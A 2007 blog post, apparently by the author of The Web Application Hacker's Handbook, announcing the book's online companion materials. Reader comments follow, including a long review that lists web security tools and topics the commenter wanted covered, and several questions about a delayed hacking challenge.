Tuesday, November 6, 2007

Hacker's Handbook - online materials

A few people have emailed me asking where is the online material promised in The Web Application Hacker's Handbook. Apologies for the slight delay on that front. I have now posted almost everything to the location below, including answers to questions, source code, and the checklist of methodology tasks. The only thing not yet ready is the hacker's challenge, of which more in due course. The book's page on the Wiley web site will be updated shortly to point here:



dre said...

I hope that you realize how awesome your book is and what a world-class job you've done with it.

After receiving it two Fridays ago, I completed the book on Wednesday and have been taking notes and searching on particular topics, bookmarking them, and integrating them with the rest of my organized thoughts on web application security testing.

There are some sections of the book which simply blow my mind away. For example - Chapter 18, "Finding Vulnerabilities in Source Code" is pure genius. You should immediately start writing a book, document, etc - just on web application vulnerability code review.

I already see/hear people both online and offline begin to talk about SQL injection inference, OOB channels, and time delay attacks (btw - what do you think of the Sensepost squeeza tool?). Chapters 9 and 14 could also be expanded into a lot more work - but I remain completely fascinated by your choices for error messages, how well they are explained, and relating it all back to actual attacks. You leave me wanting more!

The book's website is great. Can you add packer to the list of links (maybe in the Tools section)? I'll also check out the Answers section - I didn't have any problems answering the questions after reading the chapters, but it will be a good learning tool for those who need it.

I was slightly disappointed to see very few references / bibliography / credit (and you mention at the beginning of the book that you didn't want to include this information - sort of strange IMO, but maybe I just come from a different perspective). The weakest chapter was Chapter 11 (Attacking Application Logic), but I also disliked Jeremiah Grossman's business logic paper until I saw his presentation. Logic flaws are kind of hard to explain - you almost have to be there to see it and even then it's sometimes hard to explain what is going on. Chapters 16 and 17 made me yawn more than the others for maybe somewhat obvious reasons, but the content was still fairly good - I would have added a few things.

When mapping out the application, I found it strange that Google hacking wasn't covered much at all, as one major example (although there is a new book coming out on this soon, so I could see why you stayed away from that topic).

The coverage of web services is very minimal - leaving out key attacks such as SOAP array abuse, XML entity expansion, external entity attacks, schema poisoning, web services PKI, XML encryption, XQuery injection,, XDoS, malware in SOAP attachments, etc (but you did cover SOAP/XPath injection, JSON hijacking, and other topics I liked, and rather well at that!). No mention of WS security standards, xml-sig/xml-enc, schema validation, server-side encoding (in earlier chapters you cover server-side validation, but there should be output encodings for some - not SQL - server to services sinks), and other protections. However, there is a lack of explanation about WAF's (and XSG's) that I was happy to see missing.

Either your knowledge of tools, or your ability to include them in the book was a bit lacking (although I could see why since you probably wanted Burp Suite to be the focus of the book). For example - CookieWatcher? CookieSafe and CookieCuller are much more useful. Some topics were completely avoided, such as crawling/scraping Ajax, or even viewing XHR's with FireBug. You covered walking and modifying the DOM a bit when talking about DOM-based XSS (nice work here, too, btw - and the source code part on XSS is simply brilliant!). However, there are tools such as w3af, scanajax, and Sprajax that can automate much of what you said "had to be manually".

I know that pushing WebScarab and Paros as the only competitors to Burp Suite is a good idea in concept, but you probably should have covered Charles, Pantera, WebScarab-NG, Suru, and the Microsoft Press Hunting Security Bugs' Web Proxy Editor. There is also a lot to be said for passive analysis techniques such as those available in ProxMon, and possible with Pantera.

I know that ImmunityDebugger's SQL Hooker wasn't available when the book was written, but I would have liked to see these concepts covered as well - I mean - you did mention using FileMon or strace/ltrace (and Solaris truss) for helping with path traversal attacks. I've been aware of these concepts for awhile and there are some tools that will do things outside of basic protocol analyzers (e.g. JDBC spy or any RDBMS spy, etc). Commercial tools such as beSTORM and Fortify Tracer are integrating server-side-proxy SQL injection helpers, so it will be interested to see the evolution of these types of tools vs. the browser local proxies we rely on completely today.

Speaking of path traversal - you could have included some of the concepts alive in DFF Scanner, DirBuster, JBroFuzz (tons of these checks!), and again - passive analysis techniques using ProxMon.

You touched on CAPTCHA's in the authentication section all but barely, and really should have mentioned nearly-unbreakable CAPTCHA's like TEABAG_3D and at least the basic tools that can defeat most CAPTCHA's such as Caecus or gocr.

Most penetration testers (probably the majority target audience of the book) use only two types of tools: attack tools and attack analysis tools. It was really nice to see you list the Java, Flash, and ActiveX tools - as well as mentioning an editor such as Source Insight (hadn't seen that one before - most people I know use SourceEdit or SciTE instead). I know I'm almost being overly pedantic at this point, but I honestly miss some mention of AppCodeScan (code review tool), Pixy, Milk/Orizon, SWAAT, LAPSE, PHP-SAT, PhpSecAudit (all static code analysis tools) or Octotrike and the NASA SATC Automated Requirement Measurement Tool (attack-modeling and design review tools). I have always liked building tools in innovative ways such as the CSRF redirector, CSRF dorks, javascript-spider, and all the other infamous little programs over at GNUCITIZEN or 0x000000.com. I do hate to mention it, but PHP-IDS, dotnetids, and CORE GRASP might also be very useful for learning more about web application vulnerabilities because they are so close to the application. I could add many more examples, such as the .mario work, as well as HackVertor, Netcraft, myIPNeighbors, BugMeNot, TrashMail (or mailinator or dodgit, etc), and all the other cute little techniques that make web application hacking so fun.

I also know that you're preparing Burp Scanner, so I'm saddened most by the lack of inclusion of open-source scanners such as w3af (already mentioned, but worth mentioning a lot), Wapiti, Grabber, Wfuzz, SQLiX, sqlmap, sqlninja, and cruiser. Maybe this is your next book - `How to Build a Web Application Security Scanner'?

Finally - the index makes me cry... if you do a second edition - please get somebody who can do this properly.

Of course, there's a lot to talk about and don't take this as harsh criticism that would suppress the message that you have incredible writing skills and amazing ability to bring something so beautiful and useful together like you did with `The Web Application Hacker's Handbook'.

I'm going to read it from start to finish again starting tomorrow - this time with doing the Q/A. Thanks so much for posting this material up!

Anonymous said...

Any update on the challenge?!

PortSwigger said...

Mmm, the challenge. Er, no, nothing to update, sorry.

pjd said...

Is there still gonna be a hacker's challenge for readers of your book?
Or can I forget about it?
It would be a real pity as I am really enjoying your book and was looking forward to tackling the challenge.

Kind regards,


PortSwigger said...


Nothing to update since yesterday, sorry. There are lots of good quality web app hacking challenges around the web if you need something in the meantime.


Anonymous said...

Any update on the status of the hacking challenge webpage indicated in the book? Been waiting since the day the book came out... Still excited to play with it..

Anonymous said...

Any updates on the hacker challenge? Thanks.